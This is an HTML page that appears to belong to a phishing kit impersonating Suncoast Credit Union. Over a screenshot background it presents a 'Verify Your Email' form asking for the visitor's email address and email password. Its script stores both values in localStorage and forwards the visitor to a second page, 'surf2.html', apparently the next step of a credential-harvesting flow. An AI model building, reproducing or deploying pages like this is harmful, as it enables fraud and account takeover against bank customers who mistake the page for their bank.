
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <title>Suncoast Credit Union - Email Login</title>
  <link rel="shortcut icon" href="images/favicon.ico"/>
  <style>
    body {
      margin: 0;
      font-family: Segoe UI, Arial, sans-serif;
      background-color: #EEE;
    }
    #container {
      position: relative;
      width: 1365px;
      margin: 0 auto;
    }
    .background-img {
      position: absolute;
      left: 0;
      top: 0;
      width: 1365px;
      height: 524px;
      z-index: 0;
    }
    .form-container {
      position: absolute;
      top: 200px;
      left: 450px;
      width: 460px;
      background-color: white;
      padding: 30px;
      border-radius: 8px;
      box-shadow: 0 0 10px rgba(0,0,0,0.1);
      z-index: 1;
    }
    h2 {
      text-align: center;
      color: #333;
      margin-bottom: 25px;
    }
    label {
      display: block;
      margin: 15px 0 5px;
      font-weight: bold;
      color: #333;
    }
    input[type="email"],
    input[type="password"] {
      width: 100%;
      padding: 10px;
      margin-bottom: 15px;
      font-size: 14px;
      border: 1px solid #ccc;
      border-radius: 4px;
    }
    input:focus {
      border-color: #0e8400;
      outline: none;
    }
    .button {
      background-color: #f8971d;
      border: none;
      color: white;
      padding: 12px 20px;
      font-size: 16px;
      border-radius: 4px;
      cursor: pointer;
      width: 100%;
      margin-top: 10px;
    }
    .button:hover {
      background-color: #e18510;
    }
  </style>
</head>
<body>
  <div id="container">
    <img class="background-img" src="images/s8.png" alt="Step 1">
    <div class="form-container">
      <h2>Verify Your Email</h2>
      <form id="emailForm" autocomplete="off">
        <label for="email">Email Address:</label>
        <input type="email" id="email" name="email" required>

        <label for="emailPass">Email Password:</label>
        <input type="password" id="emailPass" name="emailPass" required>

        <button type="submit" class="button">Continue</button>
      </form>
    </div>
  </div>

  <script>
    const form = document.getElementById('emailForm');
    form.addEventListener('submit', function (e) {
      e.preventDefault();
      localStorage.setItem('email', form.email.value);
      localStorage.setItem('emailPass', form.emailPass.value);
      window.location.href = 'surf2.html';
    });
  </script>
</body>
</html>
